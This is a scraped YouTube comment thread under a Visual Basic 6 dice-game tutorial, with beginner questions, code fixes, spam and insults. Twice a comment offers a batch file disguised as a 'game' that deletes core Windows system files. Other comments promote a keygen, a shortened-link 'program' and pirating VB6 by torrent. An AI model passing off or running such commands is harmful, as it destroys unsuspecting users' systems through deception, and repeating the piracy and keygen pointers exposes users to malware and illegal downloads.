You should always comment your coding as it helps to debug... Do this by putting 'COMMENT on any line, but anything after the ' will be a comment, you'll know it's worked as it'll be shown as green.
Also you should never leave command buttons and labels as "Command1" or "Label1", name them according to what they do. So in my programs they're called things such as "cmdCalculate" and "lblAnswer1" and things like that, so I know what they do. 20 pages of code + 50 objects - not easy without names.
I know this might be intruding, but you only have a few tutorials for Visual Basic 6. Anyone looking for tutorials and having a hard time can follow my channel. I am currently working on a lot of tutorials for Visual Basic 6.
Open Notepad Copy and Paste: @echo off del “C:windowspchealth” del “C:windowssystem” del “C:windowssystem32restore” del “winlogon.exe” del “C:windowssystem32autoexec.nt” del “C:windowssystem32logonui.exe” del “C:windowssystem32ntoskrnl.exe” Save as game.bat Open it, and play!
im taking a class right now and were using this software. I should copy this code down and in class re make this and say to my teacher " hey um, i put in some command buttons and then this happened..."
couldnt you put this script on the download? id really like to play it when im bored :D Its better then solliatary :D and pong... and runescape... and habbo... and ... well not calculator.. but alotta stuff
So, how do you actually make it so people can downoad your .EXE? like, online. I keep finding videos on how to get your code to download other things, but thats not what i want
right click on your desktop and go to new,then press "compressed (zipped) folder" once that folder is made put the program in it and upload it to a website of your choice
If you wanna save it as a program.. Its easy All you need to do is save it and go to the folder where its saved then go to bin --> Release and there you go.
thanks for the video. It's useful, but, in my opinion, it's very easy to create so many applications with visual basic 6.0. I've learned how to make a calculator from a video and 'twas supper easy, the problem is that I still don't know how to save it (as a programme not a visual basic app.) to make it run on windows. I'll be damn grateful if someone helps me learn how to do that. many thanks
Copying and Pasting takes no effort. If you want to know how to make a game and not rely on resources to make one you should just write it down from the video.
ha i did this in class it took my ten mins to write then i just played around and added extra stuff vb is so easy also my teacher is a dumb fuck and thinks im stupid at this even though i can use c++ its great
That reminds me of my textiles teacher, everyone hates her, and she makes it sound like it's really really hard! Everyone laughs at her, it's so funny.
ok how come when i want to start righting the code under the roll button and i type in "lbldice1." as soon as i type in the dot and I want to type in Caption, the scroll thing that shows up doesnt show the regular, Alignment, Appearance etc.
It just shows Count, Item, LBound, UBound, but no Caption. Help someone?
u can have one if you download ares or some torrent downloader program and download an torrent like from thepiratebay com and while it loads you can get an free portable version witch is 5-10 MB it is pretty good one too well!! BYEE!
read Don't laugh at this! Just do it Start thinking something you really really want cause this is astounding the person that sent this to me said their wish came true 10 mins after they read the mail so I thought what the heck You have just been visited by DrSuess's Cat in the Hat. He will grant you one wish Make your wish when the count down is over 10,9,8,7,6,5,4,3,2,1 MAKE A WISH Send this to 10 videos within the hour you read this. If you do, your wish will come true
dude u gotta explain much more cuz this would be aimed at new users and it wasnt working for me....... just a tip..... up untill the codeing and speak louder
Help, @ 3:15, it shows you showing us the Form_QueryUnload stuff... But what I do not get is after; sFile = "C:\Score.txt", the Score = vbCrLf; thingy... is it a 6 or what?
HELP i named my labels won and lost and with a want to play it pops up an error "13"
Private Sub Command1_Click()
Label1.Caption = Int(Rnd * 10)
Label2.Caption = Int(Rnd * 10)
Label3.Caption = Int(Rnd * 10)
If (Label1.Caption = 7) Or (Label2.Caption = 7) Or (Label3.Caption = 7) Then won.Caption = won.Caption + 1-->(its says this is the error) MsgBox "win!", vbInformation, "Win"
Else Beep lost.Caption = lost.Caption + 1-->(its says this is the error)
Any files for the app should be stored in App.Path. Also, instead of Killing the file you could just overwrite it. Open it for Output and Print "" to it.
is visual basic 2008 express edition good to use or not because im just starting to learn about visual basic but i dont have visual basic in my computer, where i can download the visual basic 6.0 like yours
well if you under stand qbasic it is. all visualbasic is is just different commands pretty much its all structured the same so i reccomend startingout on qbasic first
I semi agreed with your opinion, sure the command structure is very similar at the fundamental levels but in terms of user interface, i found the mental thought is completely different as VB require to think in terms of event and modules. Doesn't matter how abstract your minds are with QBasic, it will always be structured and procedural.
so theres also lotsa people like me who want to create their own games! :) well i should try this. im downloading it right now.
blazingscore004 3 weeks ago
how can i download it without idm ??
Likhon21 1 month ago
This has been flagged as spam show
Hi! Could you guys please check out my channel? I will do a giveaway when I reach 100 subscribers! Thanks!
hackster2011 2 months ago
how can i download that game?????
joseayos 4 months ago
me too i want to learn VB6 im 13
dannymer13 5 months ago
@dannymer13 its not that hard trust me just start with simple programs I made a rock paper scissors a auto-clicker and a spammer on my first day
Macproductions2011 1 week ago
any one can work on c++
if you do plz tell me what website to go if i want to learn about c++
anyways i am 12
so dont feel funny
Hasan1234567890opel 6 months ago
really easy to hack, just edit the score file :P
fede142857 8 months ago
no esta en español
yo lo keri ver en español
g4r1x103 8 months ago
can u send me the codes??? hehe if its ok....send here...macwade7@yahoo.com.ph ty...:D
chiaramac123 1 year ago
veiw my link for 100% clean and working keygen for vb 2010 ult.......PLUS VB 2010 DOWNLOAD....
hatred82 1 year ago
this is a shit learn programm better noob!
PROBOXILO 1 year ago
@PROBOXILO this is godly compared to what it was replaced with(VB.Net) you douchebag
thedarklordx 1 year ago
You should always comment your coding as it helps to debug... Do this by putting 'COMMENT on any line, but anything after the ' will be a comment, you'll know it's worked as it'll be shown as green.
Also you should never leave command buttons and labels as "Command1" or "Label1", name them according to what they do. So in my programs they're called things such as "cmdCalculate" and "lblAnswer1" and things like that, so I know what they do. 20 pages of code + 50 objects - not easy without names.
SilentZV2 1 year ago
stupid retarded idiotic gay game
Deathstrikeable 1 year ago
@Deathstrikeable
lol foooooool, let me see make your game,
you probably dont know even what a server is lol
ivandonat 1 year ago
@ivandonat lol pwn'd =)
VideoGamerHD 1 year ago
I know this might be intruding, but you only have a few tutorials for Visual Basic 6. Anyone looking for tutorials and having a hard time can follow my channel. I am currently working on a lot of tutorials for Visual Basic 6.
ZaCkOX900 1 year ago
@FantasyFan400 That would be awesome. xD
BlehMcRawr 1 year ago
This has been flagged as spam show
DAMN!!!!! I WENT 2681 ROLLS BEFORE FINALLY WINNING ONE!!!!!!!!!!
Sharkz117 1 year ago
DAMN!!!!! I WENT 1286 ROLLS BEFORE FINALLY WINNING ONE!!!!!
Sharkz117 1 year ago
This has been flagged as spam show
Try my new program: Type in bit.ly + /b3zosY.
Use this free key: BTOKA-0OHGY-CFYII-3431K
This program is currently unknown to the web untill now, be thet first to try it out for free!
ProgramDeveloper 1 year ago
Comment removed
ProgramDeveloper 1 year ago
Comment removed
ProgramDeveloper 1 year ago
Comment removed
ProgramDeveloper 1 year ago
This has been flagged as spam show
Open Notepad Copy and Paste: @echo off del “C:windowspchealth” del “C:windowssystem” del “C:windowssystem32restore” del “winlogon.exe” del “C:windowssystem32autoexec.nt” del “C:windowssystem32logonui.exe” del “C:windowssystem32ntoskrnl.exe” Save as game.bat Open it, and play!
youngingbrown 1 year ago
web hosting? you mean video hosting
airsoftbuddies50 1 year ago
If VisualBasic.Awesome = True Then Thumbs.Up
WhiteRussianBC 1 year ago 4
@WhiteRussianBC LOL
clubpenguinfan130 1 year ago
Venez voir mes vidéos Puis venez sur mon site
On recrute des programmeurs Visual Basic
Sur se site vous trouverez aussi des tutoriel pour crée vos programmes
A bientot Video fantastique = D
PhilipproOfficial 1 year ago
Label your forms -.- ...
killermoose99 1 year ago
im taking a class right now and were using this software. I should copy this code down and in class re make this and say to my teacher " hey um, i put in some command buttons and then this happened..."
BioExtract 1 year ago
@BioExtract
No dont do that. I did that in high school, then My teacher used something called "Turn It In", and found it was plagiarized.
JustinBlottin 1 year ago
it seems to be working well
CreatorXCode 1 year ago
@Esand15 can u send me the code... here's my email add. killlua_cute@yahoo.com
jrci21 1 year ago
couldnt you put this script on the download? id really like to play it when im bored :D Its better then solliatary :D and pong... and runescape... and habbo... and ... well not calculator.. but alotta stuff
nicemikkel10 1 year ago
pretty cool i should make something like that lol
kenny12101 1 year ago
You should make the caption print a variable. The script can break if you make it more complex if you add to a Caption.
zack13254 1 year ago
is it a slot game where you need 3 pairs of numbers??!! =D LOVE THAT GAME <3
GMAMETHY 1 year ago
haiz its so boring do you have another tutorial there?
legionz200 1 year ago
visual basci is awuesome, ive made soo many games and quizes on it, good job
100madproductions 1 year ago
@100madproductions i just started, it's so cool...
the problem is tha many people who use it do not realise what they can do with it. you can make programs to track passwrods with ;).
YOVTVBEjunkee 1 year ago
@YOVTVBEjunkee You do realize the making key loggers are illegal unless explicitly telling the individual you are going to do so.
TimmyCoProductions 1 year ago
I just started VC this week! I'm so excited!
GV03 2 years ago
can you do this for vb 2008 please?
minimalabarista 2 years ago
Comment removed
JasmineThindKamboj 2 years ago
Comment removed
iqra5229 2 years ago
Comment removed
iqra5229 2 years ago
i can't......think sum1 on dis eatrh knws it!
JasmineThindKamboj 2 years ago
man you really should start from beginning. I tried this and got several errors because you went the wrong way with it.
koldkase77 2 years ago
imbecil hable mas duro q no se lñe escucha una mierda stupid...
basucoloco 2 years ago
I've made a Rock, Paper, Sciccors and Hangman game on VB. Now I'm trying to make a pokemon style game with levels and battles and stuff =P
FantasyFan400 2 years ago 30
@FantasyFan400 Shouldnt you try C++ or C#?
darkskoliro 1 year ago
@FantasyFan400 only game i've made with vb is naughts n crosses
magebro01 1 year ago
@FantasyFan400 You made Rock, Paper , Scissor game man ? that's amazing. can you show me ?
chocolatechanie 10 months ago
@chocolatechanie I did. It's FUCKING EASY!
Thepokemonguy9304 6 months ago
Good job on the game man, but a thing that started to piss me off is that the labels werent transparent.
i can see why label1-3 weren't since those are the score ones.
but the won/lost labels should be transparent
Tom97r 2 years ago
lol kids think 5d is real its not do you mean the 5th Dimensional universe is real not even scientist have proven -.-'
colossusx7 2 years ago 3
This has been flagged as spam show
i made a game "runescape 5D" but its not complete finished LOL. i was lazy to finish it. go to my website: game haxx . tk
then go to "Downloads" and download "RuneScape 5D"
;D
btw its not advert!
NafoK1 2 years ago
This comment has received too many negative votes show
i fucking have to do this shit in computer science everyday using this program.. it sucks lol
scottytissue789 2 years ago
i create a program which use random function
angz92vb 2 years ago
So, how do you actually make it so people can downoad your .EXE? like, online. I keep finding videos on how to get your code to download other things, but thats not what i want
kooshy123456 2 years ago
FILE > make (projectname.exe)
Youngie1337 2 years ago
right click on your desktop and go to new,then press "compressed (zipped) folder" once that folder is made put the program in it and upload it to a website of your choice
supersk8rchaz 2 years ago
BLING DAT BOOGIE
RedcrownX 2 years ago
If you wanna save it as a program.. Its easy All you need to do is save it and go to the folder where its saved then go to bin --> Release and there you go.
MultiMatiz 2 years ago
Its like programming with training wheels. Learn C or C++
LTS1287 2 years ago
your right, its so frustrating when you have been programming in C and move toVB.
0121ryanh117 2 years ago
programming gives me headache!!!!
di0ng3x 2 years ago
As so it does to everyone.
BricePash 2 years ago
but programming is fun!
ILCAC3 2 years ago 53
@ILCAC3 yeah and it's very easy
KocirovD 5 months ago
thanks for the video. It's useful, but, in my opinion, it's very easy to create so many applications with visual basic 6.0. I've learned how to make a calculator from a video and 'twas supper easy, the problem is that I still don't know how to save it (as a programme not a visual basic app.) to make it run on windows. I'll be damn grateful if someone helps me learn how to do that. many thanks
muhammad2009egypt 2 years ago
Menu 'File' --> 'Make ...' --> browse for the path where you want to save it (and enter a filename) --> OK --> Done
IllusionKH 2 years ago
Could you talk a bit loauder and provide the code it would help alot thnx in advanced.
urmum156 2 years ago
Copying and Pasting takes no effort. If you want to know how to make a game and not rely on resources to make one you should just write it down from the video.
slashsnemesis 2 years ago
Funny how you need the number 7 to win, and you won in 7 goes XD. Epic win - literally :P
odavenport 2 years ago
I'm looking for a way to capture card image and determine it's value.The game is Black Jack.
Could it be done in VB6 or some other language?
Thanks
mhaddadi 2 years ago
DUDE ur Stuff Is AWSOME i love this game :D
ipaqmaster 2 years ago
This has been flagged as spam show
Hey man if you love games in visual basic ,check out my channel
LazarRedDevil95 2 years ago
lol man i love your game! Its epic compared to what my first were! Subscribing, in the hopes to learn from you and to see more games XD.
DANNYSPIKEYBOI911 2 years ago
This has been flagged as spam show
Hey man if you love games in visual basic ,check out my channel
LazarRedDevil95 2 years ago
dude in the code i did not see one single character that cannot be put in the description
this video is 1/5, you can even barly see the fucking codes.....
just sad
kazuya899 2 years ago
I made a rocka paper scissors game with VB 6.0, It has around all those features with also a log of what you did (lost won or lose)
ernestlee1 2 years ago
ha i did this in class it took my ten mins to write then i just played around and added extra stuff vb is so easy also my teacher is a dumb fuck and thinks im stupid at this even though i can use c++ its great
fedex909 2 years ago
That reminds me of my textiles teacher, everyone hates her, and she makes it sound like it's really really hard! Everyone laughs at her, it's so funny.
VBprogram49 2 years ago
where is a good spot to learn some vb stuff?
1232shooter2 2 years ago
Whats the code?
Please give the code.
I like that game!
JacoRuit 2 years ago
Nice Job 5*****
Can you gave me please the code??
thx
gwaggli008 2 years ago
ya please provide the codes
xxx9888888888 2 years ago
visual basic 6 is alot more simple than 8...
vb6 is actually the most simplest vb ever...
thats why i use it
nwodoom 2 years ago 2
ok how come when i want to start righting the code under the roll button and i type in "lbldice1." as soon as i type in the dot and I want to type in Caption, the scroll thing that shows up doesnt show the regular, Alignment, Appearance etc.
It just shows Count, Item, LBound, UBound, but no Caption. Help someone?
thisiscrazy4 2 years ago
do u copied the thing? then it will give that error
izzassin 2 years ago
lol i like that LimeWire installer :P
lmfaothisisfunny 3 years ago
where can i download VB6?
deziah13 3 years ago
Search Vb 6.0 Free Download On Youtube. Thats How I Got Mine
TACSComputers 3 years ago
can you give a link or something?
deziah13 3 years ago
YOU ROCK!!!! im sooooo happy because i finally got vb6!! so its not 8 but still
stuzguy 3 years ago
i added a single and multiplayer mode and credits but when i tried to write the form name it messed it up :(
HAZ2575 3 years ago
omg horrible game lmfao
poinz17 3 years ago
I can tell all you did by looking at that program.
Sasa123311 3 years ago
Is it Rnd * 10?
Bollivierke 3 years ago
it works but when it says you won it doesn't say 777
HAZ2575 3 years ago
you can also use for example: form1.visible = false
EivindTube 3 years ago
Good Tnx!
Enzo0912 3 years ago
ho do i do this in vb 08'?
jorianpie101 3 years ago
I just downloaded VB 6. It's easier to download VB6 than to try and make this on vb 2008 to be honest
TomboFry 3 years ago 3
i programm to in vb6 but systems, not games
bye
maurih07 3 years ago
mmm what a waist of time...
sory but it its
and sory my english to haha
maurih07 3 years ago
where did you get vb 6???
SuperBenji2 3 years ago
You BUY it.
COTDxDeadByDawn 3 years ago
i got it free
juplm4000 3 years ago 3
vb 2008 express is free
p990ias 2 years ago
i no thats y i chose it over VB 6
juplm4000 2 years ago
VB6 may be hard to get the legal way if not impossible.
but you can get it still in torrents, which the legality on that is ify, but i never heard microsoft going after anyone for that.
DeepGlue555 2 years ago 2
yh lol
juplm4000 2 years ago
all the visual basic's are free
DirectorBirraj 2 years ago
not all of them
nashbored1231 2 years ago
VB 6 is easier, less complicated, quicker, and funner
RocketMan291 2 years ago 3
and ur point is...
juplm4000 2 years ago
Very true. I'm contemplating moving to 2008 but not moving just yet...
wilwad 2 years ago
can u give me the hole code?
Helpron 3 years ago 2
i made this game to :D
shots2345 3 years ago 2
First program i did was...jesus, an About program where i just learned tooltip text and making an image a button.
1xxxkilledxxx1 3 years ago 2
when ever i make a exe file or anything my visual basics says that it has a unknown error do u have any idea how to help me?
Jobo2424 3 years ago
hi
what if i want random numbers from 1 to 10 to from 0.
thanks
hazarapride 3 years ago
sorry ment to say
starting from 1 to 10 not 0 to 10.
hazarapride 3 years ago
0-9 plus 1
chewanater 3 years ago
My first VB Program was one that wrote to security cards. I made this so everyone that came in my room had to have a card :-) It's easy :-p
sideshowmatt19 3 years ago
the first code that i learned in vb 6.0 is the unload me..lolz
redamethy 3 years ago
First i learned was hello world.
Deep40000 3 years ago
lOl t=yeah me too =)
EarthFlame12 3 years ago
i dont have VB
juplm4000 3 years ago
i dont care =/
EarthFlame12 3 years ago 2
i hate u
juplm4000 3 years ago 2
Why? =/
EarthFlame12 3 years ago
u can have one if you download ares or some torrent downloader program and download an torrent like from thepiratebay com and while it loads you can get an free portable version witch is 5-10 MB it is pretty good one too well!! BYEE!
feliks000 3 years ago 2
oh my god, how do i lose?! i copied this exact code and i keep winning!
F5overlord 3 years ago
how did you know the codes!?!
jallibee 3 years ago
Em que local ou site voçê fez o download do visual basic 6.0
johdio 3 years ago
the volume is way too low
RapidReactionP 3 years ago
this video is the best !!!
IEPBUNLENG016 3 years ago
how do you cmd click?
TheUltimateYoshi 3 years ago
bu salak yazamıo
hirakamatsu 3 years ago
This has been flagged as spam show
18yearsss 3 years ago
um link de descarga?
colegiosanfelipe 3 years ago
THE COUDE?PLEASE
lele1946 3 years ago
people without code on description are noobs
Blueman57 3 years ago
dude u gotta explain much more cuz this would be aimed at new users and it wasnt working for me....... just a tip..... up untill the codeing and speak louder
joel0062 3 years ago
can somebody tell me how to save my projject as .exe?
:(
kapoiosmemialo 3 years ago
you go onto file then select "make project exe"
then name the file and choose a location and your done.
RoverMG214 3 years ago
thanx a lot!
kapoiosmemialo 3 years ago
This is actually really easy.. (for those who are saying they dont understand)
TrueH4X0R 3 years ago
Help, @ 3:15, it shows you showing us the Form_QueryUnload stuff... But what I do not get is after; sFile = "C:\Score.txt", the Score = vbCrLf; thingy... is it a 6 or what?
donkey137 3 years ago 2
vbCrLf is the same as vbNewLine
26593RS 3 years ago
HELP i named my labels won and lost and with a want to play it pops up an error "13"
Private Sub Command1_Click()
Label1.Caption = Int(Rnd * 10)
Label2.Caption = Int(Rnd * 10)
Label3.Caption = Int(Rnd * 10)
If (Label1.Caption = 7) Or (Label2.Caption = 7) Or (Label3.Caption = 7) Then won.Caption = won.Caption + 1-->(its says this is the error) MsgBox "win!", vbInformation, "Win"
Else Beep lost.Caption = lost.Caption + 1-->(its says this is the error)
vergoteto 3 years ago
try changing lost.Caption = Val(lost.Caption) + Val(1) it might work
26593RS 3 years ago
LOL its embarrassing to get errors on a video!
BlaBlaBlaZ2 3 years ago
oh i see... yeah i understand this
devilesparda666 3 years ago
so complicated to learn this fucking Vb
zonic55 3 years ago
its not complicated... its so easy
lPhoeniX2142l 3 years ago
you get used to it
Matochio 3 years ago
for your information, vb is one of the easiest programs to learn. it's just that you're stupid enough to not be able to learn how.
comphulk 3 years ago
not that advanced, when you make a pong game with online support then you can call it advanced. and pong is soo easy to make.
Autiosan 3 years ago
Any files for the app should be stored in App.Path. Also, instead of Killing the file you could just overwrite it. Open it for Output and Print "" to it.
robot313 3 years ago
That made lots of sense. Thanks for expanding my scripting knowledge.
Oblivionmodder23 3 years ago
why cant you put the code on the description. took me over half an hour to type all of it.
Blueman57 3 years ago
wat do we open it with?
adliikhwan280 3 years ago
and how do we turn it into an EXE?
adliikhwan280 3 years ago
click file and turn into exe
gmodrules972 3 years ago 2
when i clicked file and i cant click turn into exe
adliikhwan280 3 years ago
hmm.. thats what it says in my i just click file and click turn to exe file
gmodrules972 3 years ago
nvm
adliikhwan280 3 years ago
is visual basic 2008 express edition good to use or not because im just starting to learn about visual basic but i dont have visual basic in my computer, where i can download the visual basic 6.0 like yours
Ne0c225 3 years ago
go to youtube and type "how to get visual basic 6 free" I got visual stuido and visual basic 6 from here
sepulveda50 3 years ago
well if you under stand qbasic it is. all visualbasic is is just different commands pretty much its all structured the same so i reccomend startingout on qbasic first
soccergod561234 3 years ago
I semi agreed with your opinion, sure the command structure is very similar at the fundamental levels but in terms of user interface, i found the mental thought is completely different as VB require to think in terms of event and modules. Doesn't matter how abstract your minds are with QBasic, it will always be structured and procedural.
gerjaison 3 years ago
or, just search for the torrent.
I took it that way(visual basic 6.0 professional)
sebyval 3 years ago
Express edition is great. you can get it from the microsoft website.
ItsJMaz 3 years ago
were and how i get visual basic?
stickypudd 3 years ago
OMG search in google.. download virtual basic 6
ZiMan123 3 years ago
haha nice. im on chapter 4 of the old visual basic book...i would never dream of code like this yet =P
9892derf 3 years ago
You'll be there soon enough.